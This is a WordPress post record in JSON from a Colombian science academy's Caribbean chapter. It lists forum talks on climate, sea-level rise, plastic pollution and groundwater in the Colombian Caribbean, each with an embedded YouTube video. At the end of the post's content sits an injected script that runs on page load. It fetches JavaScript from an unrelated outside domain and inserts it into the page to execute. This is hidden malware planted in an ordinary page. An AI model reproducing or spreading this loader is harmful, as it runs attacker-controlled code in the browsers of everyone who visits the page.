{"id":794,"date":"2024-08-01T16:39:15","date_gmt":"2024-08-01T16:39:15","guid":{"rendered":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/?p=794"},"modified":"2025-06-21T01:38:06","modified_gmt":"2025-06-21T01:38:06","slug":"oceanos-2","status":"publish","type":"post","link":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/oceanos-2\/","title":{"rendered":"Charlas del foro sobre la protecci\u00f3n del recurso h\u00eddrico y oce\u00e1nico en el Caribe colombiano"},"content":{"rendered":"\n<p>En este foro organizado por el Colegio M\u00e1ximo de las Academias de Colombia, en colaboraci\u00f3n con el Cap\u00edtulo Caribe de la Academia Colombiana de Ciencias Exactas, F\u00edsicas y Naturales y la Universidad del Atl\u00e1ntico; se trataron temas relacionados con el acceso al agua en la Regi\u00f3n Caribe con procesos y consumo sostenibles dentro de sistemas resilientes al cambio clim\u00e1tico.      <\/p>\n\n\n\n<p><strong>El impacto del cambio clim\u00e1tico en la salud humana<br><\/strong>Dr. \u00c1lvaro Rodr\u00edguez Gama<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El impacto del cambio clim\u00e1tico en la salud humana - Dr. \u00c1lvaro Rodr\u00edguez Gama\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/mtzsQZ3NJBo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Implicaciones del aumento del nivel del mar en el territorio colombiano. El caso de Cartagena y las Islas Cayos de San Andres  <\/strong><br>Dr. Alberto Andrade<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Implicaciones del aumento del nivel del mar en el territorio colombiano - Dr. Alberto Andrade\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/vk0eHskAoKI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Navigating Coastal Plastic pollution<\/strong><br>Dr. Nelson Guillermo Rangel <\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Navigating Coastal Plastic pollution - Dr. Nelson Guillermo Rangel\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/m7zOkGVQYrw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Prospecci\u00f3n el\u00e9ctrica parea el estudio de agua subterr\u00e1nea en el departamento del Atl\u00e1ntico<\/strong><br>Mg. Alfredo Ghisays Ru\u00edz<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Prospecci\u00f3n el\u00e9ctrica parea el estudio de agua subterr\u00e1nea en el Atl\u00e1ntico - Mg. Alfredo Ghisays\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/IG--H1bHdo0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Humedales artificiales: una estrategia para abordar la gesti\u00f3n de aguas grises en zonas rurales  <\/strong><br>Dra. Andrea Monroy <\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Humedales artificiales: gesti\u00f3n de aguas grises en zonas rurales - Dra. Andrea Monroy\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/1qHeteseiJg?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Modelo conceptual para el desarrollo sostenible en las ci\u00e9nagas del caribe  <\/strong><br>Ing. Dorian Rodr\u00edguez Gonz\u00e1lez  <\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Modelo conceptual para el desarrollo sostenible en las ci\u00e9nagas del caribe - Ing Dorian Rodr\u00edguez\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/2KMLm5Qo3hs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Manejo sostenible del acu\u00edfero Morroa, Sucre  <\/strong><br>Ing. H\u00e9ctor Herrera Parra<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Manejo sostenible del acu\u00edfero Morroa, Sucre - Ing. H\u00e9ctor Herrera Parra\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/v7fMKFshzg4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>En este foro organizado por el Colegio M\u00e1ximo de las Academias de Colombia, en colaboraci\u00f3n con el Cap\u00edtulo Caribe de la Academia Colombiana de Ciencias Exactas, F\u00edsicas y Naturales y la Universidad del Atl\u00e1ntico; se trataron temas relacionados con el acceso al agua en la Regi\u00f3n Caribe con procesos y [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":918,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-794","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-agua"],"_links":{"self":[{"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/posts\/794","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/comments?post=794"}],"version-history":[{"count":4,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/posts\/794\/revisions"}],"predecessor-version":[{"id":1219,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/posts\/794\/revisions\/1219"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/media\/918"}],"wp:attachment":[{"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/media?parent=794"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/categories?post=794"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/accefyn.com\/microsites\/capitulos\/caribe\/wp-json\/wp\/v2\/tags?post=794"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}